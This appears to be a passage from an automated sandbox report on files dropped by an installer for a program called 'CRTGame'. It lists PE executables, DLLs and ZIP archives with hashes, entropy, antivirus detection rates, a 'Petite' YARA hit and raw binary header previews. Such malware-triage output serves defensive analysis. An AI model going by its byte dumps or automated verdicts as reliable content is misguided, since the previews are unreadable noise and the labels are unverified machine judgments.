                                                                            SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):337408
                                                                            Entropy (8bit):6.515131904432587
                                                                            Encrypted:false
                                                                            SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                            MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                            SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                            SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                            SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):394752
                                                                            Entropy (8bit):6.662070316214798
                                                                            Encrypted:false
                                                                            SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                            MD5:A4123DE65270C91849FFEB8515A864C4
                                                                            SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                            SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                            SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):772608
                                                                            Entropy (8bit):6.546391052615969
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                            MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                            SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                            SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                            SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):36416
                                                                            Entropy (8bit):7.842278356440954
                                                                            Encrypted:false
                                                                            SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                            MD5:BEBA64522AA8265751187E38D1FC0653
                                                                            SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                            SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                            SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):35588
                                                                            Entropy (8bit):7.817557274117395
                                                                            Encrypted:false
                                                                            SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                            MD5:58521D1AC2C588B85642354F6C0C7812
                                                                            SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                            SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                            SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):112640
                                                                            Entropy (8bit):6.540227486061059
                                                                            Encrypted:false
                                                                            SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                            MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                            SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                            SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                            SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):123406
                                                                            Entropy (8bit):6.263889638223575
                                                                            Encrypted:false
                                                                            SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                            MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                            SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                            SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                            SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):16910
                                                                            Entropy (8bit):5.289608933932413
                                                                            Encrypted:false
                                                                            SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                            MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                            SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                            SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                            SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):214016
                                                                            Entropy (8bit):6.676457645865373
                                                                            Encrypted:false
                                                                            SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                            MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                            SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                            SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                            SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):512014
                                                                            Entropy (8bit):6.566561154468342
                                                                            Encrypted:false
                                                                            SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                            MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                            SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                            SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                            SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):906766
                                                                            Entropy (8bit):6.450201653594769
                                                                            Encrypted:false
                                                                            SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                            MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                            SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                            SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                            SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):112640
                                                                            Entropy (8bit):6.540227486061059
                                                                            Encrypted:false
                                                                            SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                            MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                            SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                            SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                            SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                            Malicious:false
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):315918
                                                                            Entropy (8bit):6.5736483262229735
                                                                            Encrypted:false
                                                                            SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                            MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                            SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                            SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                            SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):7910
                                                                            Entropy (8bit):6.931925007191986
                                                                            Encrypted:false
                                                                            SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                            MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                            SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                            SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                            SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmp, Author: Joe Security
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):13838
                                                                            Entropy (8bit):5.173769974589746
                                                                            Encrypted:false
                                                                            SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                            MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                            SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                            SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                            SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):31936
                                                                            Entropy (8bit):6.6461204214578
                                                                            Encrypted:false
                                                                            SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                            MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                            SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                            SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                            SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):967168
                                                                            Entropy (8bit):6.500850562754145
                                                                            Encrypted:false
                                                                            SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                            MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                            SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                            SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                            SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):506871
                                                                            Entropy (8bit):7.998074018431883
                                                                            Encrypted:true
                                                                            SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                            MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                            SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                            SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                            SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                            Malicious:false
                                                                            Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):506871
                                                                            Entropy (8bit):7.998074018431883
                                                                            Encrypted:true
                                                                            SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                            MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                            SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                            SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                            SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                            Malicious:false
